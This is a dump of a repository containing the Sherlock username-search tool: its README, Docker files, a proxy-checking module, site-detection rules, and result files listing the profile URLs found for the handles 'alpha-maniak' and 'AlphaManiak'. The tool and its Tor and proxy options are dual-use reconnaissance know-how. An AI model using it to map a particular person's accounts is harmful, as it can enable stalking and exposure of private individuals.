| https://yandex.ru/collections/user/AlphaManiak/ 17 | https://bbs.boingboing.net/u/AlphaManiak 18 | https://last.fm/user/AlphaManiak 19 | Total Websites Username Detected On : 18 -------------------------------------------------------------------------------- /sherlock/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at yahya.arbabi@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /sherlock/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How To Contribute To Sherlock 2 | First off, thank you for the help! 3 | 4 | There are many ways to contribute. Here is some high level grouping. 5 | 6 | ## Adding New Sites 7 | 8 | Please look at the Wiki entry on 9 | [adding new sites](https://github.com/sherlock-project/sherlock/wiki/Adding-Sites-To-Sherlock) 10 | to understand the issues. 11 | 12 | Any new sites that are added need to have a username that has been claimed, and one 13 | that is unclaimed documented in the site data. This allows the regression tests 14 | to ensure that everything is working. 15 | 16 | It is required that a contributer test any new sites by either running the full tests, or running 17 | a site-specific query against the claimed and unclaimed usernames. 18 | 19 | It is not required that a contributer run the 20 | [site_list.py](https://github.com/sherlock-project/sherlock/blob/master/site_list.py) 21 | script. 22 | 23 | If there are performance problems with a site (e.g. slow to respond, unreliable uptime, ...), then 24 | the site may be removed from the list. The 25 | [removed_sites.md](https://github.com/sherlock-project/sherlock/blob/master/removed_sites.md) 26 | file contains sites that were included at one time in Sherlock, but had to be removed for 27 | one reason or another. 28 | 29 | In regards to adult sites (e.g. PornHub), we have agreed to not include them in Sherlock. 30 | However, we do understand that some users desires this support. The data.json file is easy to add to, 31 | so users will be able to maintain their own forks to have this support. This is not ideal. 32 | Maybe there could be another repo with an adult data.json? That would avoid forks getting out of date. 33 | 34 | ## Adding New Functionality 35 | 36 | Please ensure that the content on your branch passes all tests before submitting a pull request. 37 | -------------------------------------------------------------------------------- /sherlock/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7-alpine as build 2 | WORKDIR /wheels 3 | RUN apk add --no-cache \ 4 | g++ \ 5 | gcc \ 6 | git \ 7 | libxml2 \ 8 | libxml2-dev \ 9 | libxslt-dev \ 10 | linux-headers 11 | COPY requirements.txt /opt/sherlock/ 12 | RUN pip3 wheel -r /opt/sherlock/requirements.txt 13 | 14 | 15 | FROM python:3.7-alpine 16 | WORKDIR /opt/sherlock 17 | ARG VCS_REF 18 | ARG VCS_URL="https://github.com/sherlock-project/sherlock" 19 | LABEL org.label-schema.vcs-ref=$VCS_REF \ 20 | org.label-schema.vcs-url=$VCS_URL 21 | COPY --from=build /wheels /wheels 22 | COPY . /opt/sherlock/ 23 | RUN pip3 install -r requirements.txt -f /wheels \ 24 | && rm -rf /wheels \ 25 | && rm -rf /root/.cache/pip/* 26 | 27 | ENTRYPOINT ["python", "sherlock.py"] 28 | -------------------------------------------------------------------------------- /sherlock/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Sherlock Project 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sherlock/README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 |
6 | Hunt down social media accounts by username across social networks 7 |
8 | 9 | 10 | 11 | 12 | Website 13 | docker image 14 |

15 | 16 |

17 | Demo 18 |    |    19 | Installation 20 |    |    21 | Usage 22 |    |    23 | Docker Notes 24 |    |    25 | Adding New Sites 26 |

27 | 28 |

29 | 30 | 31 | 32 |

33 | 34 | 35 | 36 | 37 | ## Demo 38 | 39 | Use this link to test Sherlock directly in your browser: 40 | https://elody.com/scenario/plan/16/ 41 | 42 | ## Installation 43 | 44 | **NOTE**: Python 3.6 or higher is required. 45 | 46 | ```bash 47 | # clone the repo 48 | $ git clone https://github.com/sherlock-project/sherlock.git 49 | 50 | # change the working directory to sherlock 51 | $ cd sherlock 52 | 53 | # install python3 and python3-pip if they are not installed 54 | 55 | # install the requirements 56 | $ python3 -m pip install -r requirements.txt 57 | ``` 58 | [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/sherlock-project/sherlock&tutorial=README.md) 59 | 60 | ## Usage 61 | 62 | ```bash 63 | $ python3 sherlock.py --help 64 | usage: sherlock.py [-h] [--version] [--verbose] [--rank] 65 | [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] 66 | [--unique-tor] [--csv] [--site SITE_NAME] 67 | [--proxy PROXY_URL] [--json JSON_FILE] 68 | [--proxy_list PROXY_LIST] [--check_proxies CHECK_PROXY] 69 | [--timeout TIMEOUT] [--print-found] 70 | USERNAMES [USERNAMES ...] 71 | 72 | Sherlock: Find Usernames Across Social Networks (Version 0.10.7) 73 | 74 | positional arguments: 75 | USERNAMES One or more usernames to check with social networks. 76 | 77 | optional arguments: 78 | -h, --help show this help message and exit 79 | --version Display version information and dependencies. 80 | --verbose, -v, -d, --debug 81 | Display extra debugging information and metrics. 82 | --rank, -r Present websites ordered by their Alexa.com global 83 | rank in popularity. 84 | --folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT 85 | If using multiple usernames, the output of the results 86 | will be saved to this folder. 87 | --output OUTPUT, -o OUTPUT 88 | If using single username, the output of the result 89 | will be saved to this file. 90 | --tor, -t Make requests over Tor; increases runtime; requires 91 | Tor to be installed and in system path. 92 | --unique-tor, -u Make requests over Tor with new Tor circuit after each 93 | request; increases runtime; requires Tor to be 94 | installed and in system path. 95 | --csv Create Comma-Separated Values (CSV) File. 96 | --site SITE_NAME Limit analysis to just the listed sites. Add multiple 97 | options to specify more than one site. 98 | --proxy PROXY_URL, -p PROXY_URL 99 | Make requests over a proxy. e.g. 100 | socks5://127.0.0.1:1080 101 | --json JSON_FILE, -j JSON_FILE 102 | Load data from a JSON file or an online, valid, JSON 103 | file. 104 | --proxy_list PROXY_LIST, -pl PROXY_LIST 105 | Make requests over a proxy randomly chosen from a list 106 | generated from a .csv file. 107 | --check_proxies CHECK_PROXY, -cp CHECK_PROXY 108 | To be used with the '--proxy_list' parameter. The 109 | script will check if the proxies supplied in the .csv 110 | file are working and anonymous.Put 0 for no limit on 111 | successfully checked proxies, or another number to 112 | institute a limit. 113 | --timeout TIMEOUT Time (in seconds) to wait for response to requests. 114 | Default timeout of 60.0s.A longer timeout will be more 115 | likely to get results from slow sites.On the other 116 | hand, this may cause a long delay to gather all 117 | results. 118 | --print-found Do not output sites where the username was not found. 119 | --no-color Don't color terminal output 120 | --browse, -b Browse to all results on default bowser. 121 | ``` 122 | 123 | To search for only one user: 124 | ``` 125 | python3 sherlock.py user123 126 | ``` 127 | 128 | To search for more than one user: 129 | ``` 130 | python3 sherlock.py user1 user2 user3 131 | ``` 132 | 133 | Accounts found will be stored in an individual text file with the corresponding username (e.g ```user123.txt```). 134 | 135 | ## Anaconda (Windows) Notes 136 | If you are using Anaconda in Windows, using 'python3' might not work. Use 'python' instead. 137 | 138 | ## Docker Notes 139 | If docker is installed you can build an image and run this as a container. 140 | 141 | ``` 142 | docker build -t mysherlock-image . 143 | ``` 144 | 145 | Once the image is built, sherlock can be invoked by running the following: 146 | 147 | ``` 148 | docker run --rm -t mysherlock-image user123 149 | ``` 150 | 151 | The optional ```--rm``` flag removes the container filesystem on completion to prevent cruft build-up. See: https://docs.docker.com/engine/reference/run/#clean-up---rm 152 | 153 | The optional ```-t``` flag allocates a pseudo-TTY which allows colored output. See: https://docs.docker.com/engine/reference/run/#foreground 154 | 155 | Use the following command to access the saved results: 156 | 157 | ``` 158 | docker run --rm -t -v "$PWD/results:/opt/sherlock/results" mysherlock-image -o /opt/sherlock/results/text.txt user123 159 | ``` 160 | 161 | The ```-v "$PWD/results:/opt/sherlock/results"``` option tells docker to create (or use) the folder `results` in the 162 | present working directory and to mount it at `/opt/sherlock/results` on the docker container. 163 | The `-o /opt/sherlock/results/text.txt` option tells `sherlock` to output the result. 164 | 165 | Or you can use "Docker Hub" to run `sherlock`: 166 | ``` 167 | docker run theyahya/sherlock user123 168 | ``` 169 | 170 | ### Using `docker-compose` 171 | 172 | You can use the `docker-compose.yml` file from the repository and use this command: 173 | 174 | ``` 175 | docker-compose run sherlock -o /opt/sherlock/results/text.txt user123 176 | ``` 177 | 178 | ## Adding New Sites 179 | 180 | Please look at the Wiki entry on 181 | [adding new sites](https://github.com/TheYahya/sherlock/wiki/Adding-Sites-To-Sherlock) 182 | to understand the issues. 183 | 184 | **NOTE**: Sherlock is not accepting adult sites in the standard list. 185 | 186 | ## Tests 187 | Thank you for contributing to Sherlock! 188 | 189 | Before creating a pull request with new development, please run the tests 190 | to ensure that everything is working great. It would also be a good idea to run the tests 191 | before starting development to distinguish problems between your 192 | environment and the Sherlock software. 193 | 194 | The following is an example of the command line to run all the tests for 195 | Sherlock. This invocation hides the progress text that Sherlock normally 196 | outputs, and instead shows the verbose output of the tests. 197 | 198 | ``` 199 | $ python3 -m unittest tests.all --buffer --verbose 200 | ``` 201 | 202 | Note that we do currently have 100% test coverage. Unfortunately, some of 203 | the sites that Sherlock checks are not always reliable, so it is common 204 | to get response errors. 205 | 206 | If some sites are failing due to conection problems (site is down, in maintainence, etc) 207 | you can exclude them from tests by creating a `tests/.excluded_sites` file with a 208 | list of sites to ignore (one site name per line). 209 | 210 | ## Stargazers over time 211 | 212 | [![Stargazers over time](https://starcharts.herokuapp.com/TheYahya/sherlock.svg)](https://starcharts.herokuapp.com/TheYahya/sherlock) 213 | 214 | ## License 215 | 216 | MIT © Sherlock Project
217 | Original Creator - [Siddharth Dushantha](https://github.com/sdushantha) 218 | -------------------------------------------------------------------------------- /sherlock/__pycache__/load_proxies.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/__pycache__/load_proxies.cpython-37.pyc -------------------------------------------------------------------------------- /sherlock/alpha-maniak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$alpha-maniak 2 | https://fortnitetracker.com/profile/all/alpha-maniak 3 | https://www.gpsies.com/mapUser.do?username=alpha-maniak 4 | http://alpha-maniak.insanejournal.com/profile 5 | https://yandex.ru/collections/user/alpha-maniak/ 6 | https://bbs.boingboing.net/u/alpha-maniak 7 | https://elwo.ru/index/8-0-alpha-maniak 8 | https://www.opennet.ru/~alpha-maniak 9 | http://pedsovet.su/index/8-0-alpha-maniak 10 | https://radioskot.ru/index/8-0-alpha-maniak 11 | Total Websites Username Detected On : 10 -------------------------------------------------------------------------------- /sherlock/data_bad_site.json: -------------------------------------------------------------------------------- 1 | { 2 | "AngelList": { 3 | "errorType": "status_code", 4 | "rank": 5767, 5 | "url": "https://angel.co/{}", 6 | "urlMain": "https://angel.co/", 7 | "username_claimed": "blue", 8 | "username_unclaimed": "noonewouldeverusethis7" 9 | }, 10 | "Basecamp": { 11 | "errorMsg": "The account you were looking for doesn't exist", 12 | "errorType": "message", 13 | "rank": 4914, 14 | "url": "https://{}.basecamphq.com", 15 | "urlMain": "https://basecamp.com/", 16 | "username_claimed": "blue", 17 | "username_unclaimed": "noonewouldeverusethis7" 18 | }, 19 | "BlackPlanet": { 20 | "errorMsg": "My Hits", 21 | "errorType": "message", 22 | "rank": 110021, 23 | "url": "http://blackplanet.com/{}", 24 | "urlMain": "http://blackplanet.com/" 25 | }, 26 | "CapFriendly": { 27 | "errorMsg": "No User Found", 28 | "errorType": "message", 29 | "rank": 64100, 30 | "url": "https://www.capfriendly.com/users/{}", 31 | "urlMain": "https://www.capfriendly.com/", 32 | "username_claimed": "blue", 33 | "username_unclaimed": "noonewouldeverusethis" 34 | }, 35 | "Canva": { 36 | "errorType": "response_url", 37 | "errorUrl": "https://www.canva.com/{}", 38 | "rank": 128, 39 | "url": "https://www.canva.com/{}", 40 | "urlMain": "https://www.canva.com/", 41 | "username_claimed": "jenny", 42 | "username_unclaimed": "xgtrq" 43 | }, 44 | "Codementor": { 45 | "errorType": "status_code", 46 | "rank": 10252, 47 | "url": "https://www.codementor.io/@{}", 48 | "urlMain": "https://www.codementor.io/", 49 | "username_claimed": "blue", 50 | "username_unclaimed": "noonewouldeverusethis7" 51 | }, 52 | "Codepen": { 53 | "errorType": "status_code", 54 | "rank": 1359, 55 | "url": "https://codepen.io/{}", 56 | "urlMain": "https://codepen.io/", 57 | "username_claimed": "blue", 58 | "username_unclaimed": "noonewouldeverusethis7" 59 | }, 60 | "EVE Online": { 61 | "errorType": "response_url", 62 | "errorUrl": "https://eveonline.com", 63 | "rank": 15347, 64 | "url": "https://evewho.com/pilot/{}/", 65 | "urlMain": "https://eveonline.com", 66 | "username_claimed": "blue", 67 | "username_unclaimed": "noonewouldeverusethis7" 68 | }, 69 | "fanpop": { 70 | "errorType": "response_url", 71 | "errorUrl": "http://www.fanpop.com/", 72 | "rank": 9454, 73 | "url": "http://www.fanpop.com/fans/{}", 74 | "urlMain": "http://www.fanpop.com/", 75 | "username_claimed": "blue", 76 | "username_unclaimed": "noonewould_everusethis7" 77 | }, 78 | "Fotolog": { 79 | "errorType": "status_code", 80 | "rank": 47777, 81 | "url": "https://fotolog.com/{}", 82 | "urlMain": "https://fotolog.com/" 83 | }, 84 | "Foursquare": { 85 | "errorType": "status_code", 86 | "rank": 1843, 87 | "url": "https://foursquare.com/{}", 88 | "urlMain": "https://foursquare.com/", 89 | "username_claimed": "dens", 90 | "username_unclaimed": "noonewouldeverusethis7" 91 | }, 92 | "furaffinity": { 93 | "errorMsg": "user cannot be found", 94 | "errorType": "message", 95 | "rank": 0, 96 | "url": "https://www.furaffinity.net/user/{}", 97 | "urlMain": "https://www.furaffinity.net", 98 | "username_claimed": "blue", 99 | "username_unclaimed": "noonewouldeverusethis777777" 100 | }, 101 | "Imgur": { 102 | "errorType": "status_code", 103 | "rank": 74, 104 | "url": "https://imgur.com/user/{}", 105 | "urlMain": "https://imgur.com/", 106 | "username_claimed": "blue", 107 | "username_unclaimed": "noonewouldeverusethis7" 108 | }, 109 | "Khan Academy": { 110 | "errorType": "status_code", 111 | "rank": 377, 112 | "url": "https://www.khanacademy.org/profile/{}", 113 | "urlMain": "https://www.khanacademy.org/", 114 | "username_claimed": "blue", 115 | "username_unclaimed": "noonewouldeverusethis7" 116 | }, 117 | "KiwiFarms": { 118 | "errorMsg": "The specified member cannot be found", 119 | "errorType": "message", 120 | "rank": 38737, 121 | "url": "https://kiwifarms.net/members/?username={}", 122 | "urlMain": "https://kiwifarms.net/", 123 | "username_claimed": "blue", 124 | "username_unclaimed": "noonewouldeverusethis" 125 | }, 126 | "linkedin.com": { 127 | "errorMsg": "This profile is not available", 128 | "errorType": "message", 129 | "rank": 0, 130 | "url": "https://www.linkedin.com/in/{}", 131 | "urlMain": "https://www.linkedin.com/", 132 | "username_claimed": "alex", 133 | "username_unclaimed": "noonewouldeverusethis7" 134 | }, 135 | "PayPal": { 136 | "errorType": "response_url", 137 | "errorUrl": "https://www.paypal.com/paypalme2/404", 138 | "rank": 18441, 139 | "url": "https://www.paypal.com/paypalme2/{}", 140 | "urlMain": "https://www.paypal.me/", 141 | "username_claimed": "blue", 142 | "username_unclaimed": "noneownsthisusername" 143 | }, 144 | "Pexels": { 145 | "errorType": "status_code", 146 | "rank": 745, 147 | "url": "https://www.pexels.com/@{}", 148 | "urlMain": "https://www.pexels.com/", 149 | "username_claimed": "bruno", 150 | "username_unclaimed": "noonewouldeverusethis7" 151 | }, 152 | "Pixabay": { 153 | "errorType": "status_code", 154 | "rank": 378, 155 | "url": "https://pixabay.com/en/users/{}", 156 | "urlMain": "https://pixabay.com/", 157 | "username_claimed": "blue", 158 | "username_unclaimed": "noonewouldeverusethis7" 159 | }, 160 | "PowerShell Gallery": { 161 | "errorType": "status_code", 162 | "rank": 163562, 163 | "url": "https://www.powershellgallery.com/profiles/{}", 164 | "urlMain": "https://www.powershellgallery.com", 165 | "username_claimed": "powershellteam", 166 | "username_unclaimed": "noonewouldeverusethis7" 167 | }, 168 | "RamblerDating": { 169 | "errorType": "response_url", 170 | "errorUrl": "https://dating.rambler.ru/page/{}", 171 | "rank": 322, 172 | "url": "https://dating.rambler.ru/page/{}", 173 | "urlMain": "https://dating.rambler.ru/", 174 | "username_claimed": "blue", 175 | "username_unclaimed": "noonewouldeverusethis7" 176 | }, 177 | "Shockwave": { 178 | "errorMsg": "Oh no! You just finished all of the games on the internet!", 179 | "errorType": "message", 180 | "rank": 35916, 181 | "url": "http://www.shockwave.com/member/profiles/{}.jsp", 182 | "urlMain": "http://www.shockwave.com/", 183 | "username_claimed": "blue", 184 | "username_unclaimed": "noonewouldeverusethis" 185 | }, 186 | "StreamMe": { 187 | "errorType": "status_code", 188 | "rank": 31702, 189 | "url": "https://www.stream.me/{}", 190 | "urlMain": "https://www.stream.me/", 191 | "username_claimed": "blue", 192 | "username_unclaimed": "noonewouldeverusethis7" 193 | }, 194 | "Teknik": { 195 | "errorMsg": "The user does not exist", 196 | "errorType": "message", 197 | "rank": 357163, 198 | "url": "https://user.teknik.io/{}", 199 | "urlMain": "https://teknik.io/", 200 | "username_claimed": "red", 201 | "username_unclaimed": "noonewouldeverusethis7" 202 | }, 203 | "YandexMarket": { 204 | "errorMsg": "\u0422\u0443\u0442 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435\u0442", 205 | "errorType": "message", 206 | "rank": 47, 207 | "url": "https://market.yandex.ru/user/{}/achievements", 208 | "urlMain": "https://market.yandex.ru/", 209 | "username_claimed": "blue", 210 | "username_unclaimed": "noonewouldeverusethis7" 211 | }, 212 | "Insanejournal": { 213 | "errorMsg": "Unknown user", 214 | "errorType": "message", 215 | "rank": 29728, 216 | "url": "http://{}.insanejournal.com/profile", 217 | "urlMain": "insanejournal.com", 218 | "username_claimed": "blue", 219 | "username_unclaimed": "dlyr6cd" 220 | } 221 | } 222 | 223 | -------------------------------------------------------------------------------- /sherlock/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | sherlock: 5 | build: . 6 | image: theyahya/sherlock 7 | volumes: 8 | - "./results:/opt/sherlock/results" 9 | -------------------------------------------------------------------------------- /sherlock/images/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/images/preview.png -------------------------------------------------------------------------------- /sherlock/images/sherlock_preview.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/sherlock/images/sherlock_preview.gif -------------------------------------------------------------------------------- /sherlock/load_proxies.py: -------------------------------------------------------------------------------- 1 | import csv 2 | import requests 3 | import time 4 | from collections import namedtuple 5 | from colorama import Fore, Style 6 | 7 | 8 | def load_proxies_from_csv(path_to_list): 9 | """ 10 | A function which loads proxies from a .csv file, to a list. 11 | 12 | Inputs: path to .csv file which contains proxies, described by fields: 'ip', 'port', 'protocol'. 13 | 14 | Outputs: list containing proxies stored in named tuples. 15 | """ 16 | Proxy = namedtuple('Proxy', ['ip', 'port', 'protocol']) 17 | 18 | with open(path_to_list, 'r') as csv_file: 19 | csv_reader = csv.DictReader(csv_file) 20 | proxies = [Proxy(line['ip'],line['port'],line['protocol']) for line in csv_reader] 21 | 22 | return proxies 23 | 24 | 25 | def check_proxy(proxy_ip, proxy_port, protocol): 26 | """ 27 | A function which test the proxy by attempting 28 | to make a request to the designated website. 29 | 30 | We use 'wikipedia.org' as a test, since we can test the proxy anonymity 31 | by check if the returning 'X-Client-IP' header matches the proxy ip. 32 | """ 33 | full_proxy = f'{protocol}://{proxy_ip}:{proxy_port}' 34 | proxies = {'http': full_proxy, 'https': full_proxy} 35 | try: 36 | r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=4) 37 | return_proxy = r.headers['X-Client-IP'] 38 | if proxy_ip==return_proxy: 39 | return True 40 | else: 41 | return False 42 | except Exception: 43 | return False 44 | 45 | 46 | def check_proxy_list(proxy_list, max_proxies=None): 47 | """ 48 | A function which takes in one mandatory argument -> a proxy list in 49 | the format returned by the function 'load_proxies_from_csv'. 50 | 51 | It also takes an optional argument 'max_proxies', if the user wishes to 52 | cap the number of validated proxies. 53 | 54 | Each proxy is tested by the check_proxy function. Since each test is done on 55 | 'wikipedia.org', in order to be considerate to Wikipedia servers, we are not using any async modules, 56 | but are sending successive requests each separated by at least 1 sec. 57 | 58 | Outputs: list containing proxies stored in named tuples. 59 | """ 60 | print((Style.BRIGHT + Fore.GREEN + "[" + 61 | Fore.YELLOW + "*" + 62 | Fore.GREEN + "] Started checking proxies.")) 63 | working_proxies = [] 64 | 65 | # If the user has limited the number of proxies we need, 66 | # the function will stop when the working_proxies 67 | # loads the max number of requested proxies. 68 | if max_proxies != None: 69 | for proxy in proxy_list: 70 | if len(working_proxies) < max_proxies: 71 | time.sleep(1) 72 | if check_proxy(proxy.ip,proxy.port,proxy.protocol) == True: 73 | working_proxies.append(proxy) 74 | else: 75 | break 76 | else: 77 | for proxy in proxy_list: 78 | time.sleep(1) 79 | if check_proxy(proxy.ip,proxy.port,proxy.protocol) == True: 80 | working_proxies.append(proxy) 81 | 82 | if len(working_proxies) > 0: 83 | print((Style.BRIGHT + Fore.GREEN + "[" + 84 | Fore.YELLOW + "*" + 85 | Fore.GREEN + "] Finished checking proxies.")) 86 | return working_proxies 87 | 88 | else: 89 | raise Exception("Found no working proxies.") 90 | -------------------------------------------------------------------------------- /sherlock/removed_sites.md: -------------------------------------------------------------------------------- 1 | # List Of Sites Removed From Sherlock 2 | 3 | This is a list of sites implemented in such a way that the current design of 4 | Sherlock is not capable of determining if a given username exists or not. 5 | They are listed here in the hope that things may change in the future 6 | so they may be re-included. 7 | 8 | 9 | ## Basecamp 10 | 11 | As of 2020-02-23, all usernames are reported as not existing. 12 | 13 | Why was this ever added? It does not look like a social network. 14 | 15 | ``` 16 | "Basecamp": { 17 | "errorMsg": "The account you were looking for doesn't exist", 18 | "errorType": "message", 19 | "rank": 4914, 20 | "url": "https://{}.basecamphq.com", 21 | "urlMain": "https://basecamp.com/", 22 | "username_claimed": "blue", 23 | "username_unclaimed": "noonewouldeverusethis7" 24 | }, 25 | ``` 26 | 27 | ## Fanpop 28 | 29 | As of 2020-02-23, all usernames are reported as not existing. 30 | 31 | ``` 32 | "fanpop": { 33 | "errorType": "response_url", 34 | "errorUrl": "http://www.fanpop.com/", 35 | "rank": 9454, 36 | "url": "http://www.fanpop.com/fans/{}", 37 | "urlMain": "http://www.fanpop.com/", 38 | "username_claimed": "blue", 39 | "username_unclaimed": "noonewould_everusethis7" 40 | }, 41 | ``` 42 | 43 | ## Canva 44 | 45 | As of 2020-02-23, all usernames are reported as not existing. 46 | 47 | ``` 48 | "Canva": { 49 | "errorType": "response_url", 50 | "errorUrl": "https://www.canva.com/{}", 51 | "rank": 128, 52 | "url": "https://www.canva.com/{}", 53 | "urlMain": "https://www.canva.com/", 54 | "username_claimed": "jenny", 55 | "username_unclaimed": "xgtrq" 56 | }, 57 | ``` 58 | 59 | ## Pixabay 60 | 61 | As of 2020-01-21, all usernames are reported as not existing. 62 | 63 | ``` 64 | "Pixabay": { 65 | "errorType": "status_code", 66 | "rank": 378, 67 | "url": "https://pixabay.com/en/users/{}", 68 | "urlMain": "https://pixabay.com/", 69 | "username_claimed": "blue", 70 | "username_unclaimed": "noonewouldeverusethis7" 71 | }, 72 | ``` 73 | 74 | ## Pexels 75 | 76 | As of 2020-01-21, all usernames are reported as not existing. 77 | 78 | ``` 79 | "Pexels": { 80 | "errorType": "status_code", 81 | "rank": 745, 82 | "url": "https://www.pexels.com/@{}", 83 | "urlMain": "https://www.pexels.com/", 84 | "username_claimed": "bruno", 85 | "username_unclaimed": "noonewouldeverusethis7" 86 | }, 87 | ``` 88 | 89 | ## RamblerDating 90 | 91 | As of 2019-12-31, site always times out. 92 | 93 | ``` 94 | "RamblerDating": { 95 | "errorType": "response_url", 96 | "errorUrl": "https://dating.rambler.ru/page/{}", 97 | "rank": 322, 98 | "url": "https://dating.rambler.ru/page/{}", 99 | "urlMain": "https://dating.rambler.ru/", 100 | "username_claimed": "blue", 101 | "username_unclaimed": "noonewouldeverusethis7" 102 | }, 103 | ``` 104 | 105 | ## YandexMarket 106 | 107 | As of 2019-12-31, all usernames are reported as existing. 108 | 109 | ``` 110 | "YandexMarket": { 111 | "errorMsg": "\u0422\u0443\u0442 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435\u0442", 112 | "errorType": "message", 113 | "rank": 47, 114 | "url": "https://market.yandex.ru/user/{}/achievements", 115 | "urlMain": "https://market.yandex.ru/", 116 | "username_claimed": "blue", 117 | "username_unclaimed": "noonewouldeverusethis7" 118 | }, 119 | ``` 120 | 121 | ## Codementor 122 | 123 | As of 2019-12-31, usernames that exist are not detected. 124 | 125 | ``` 126 | "Codementor": { 127 | "errorType": "status_code", 128 | "rank": 10252, 129 | "url": "https://www.codementor.io/@{}", 130 | "urlMain": "https://www.codementor.io/", 131 | "username_claimed": "blue", 132 | "username_unclaimed": "noonewouldeverusethis7" 133 | }, 134 | ``` 135 | 136 | ## KiwiFarms 137 | 138 | As of 2019-12-31, the site gives a 403 for all usernames. You have to 139 | be logged into see a profile. 140 | 141 | ``` 142 | "KiwiFarms": { 143 | "errorMsg": "The specified member cannot be found", 144 | "errorType": "message", 145 | "rank": 38737, 146 | "url": "https://kiwifarms.net/members/?username={}", 147 | "urlMain": "https://kiwifarms.net/", 148 | "username_claimed": "blue", 149 | "username_unclaimed": "noonewouldeverusethis" 150 | }, 151 | ``` 152 | 153 | ## Teknik 154 | 155 | As of 2019-11-30, the site causes Sherlock to just hang. 156 | 157 | ``` 158 | "Teknik": { 159 | "errorMsg": "The user does not exist", 160 | "errorType": "message", 161 | "rank": 357163, 162 | "url": "https://user.teknik.io/{}", 163 | "urlMain": "https://teknik.io/", 164 | "username_claimed": "red", 165 | "username_unclaimed": "noonewouldeverusethis7" 166 | } 167 | ``` 168 | 169 | ## Shockwave 170 | 171 | As of 2019-11-28, usernames that exist give a 503 "Service Unavailable" 172 | HTTP Status. 173 | 174 | ``` 175 | "Shockwave": { 176 | "errorMsg": "Oh no! You just finished all of the games on the internet!", 177 | "errorType": "message", 178 | "rank": 35916, 179 | "url": 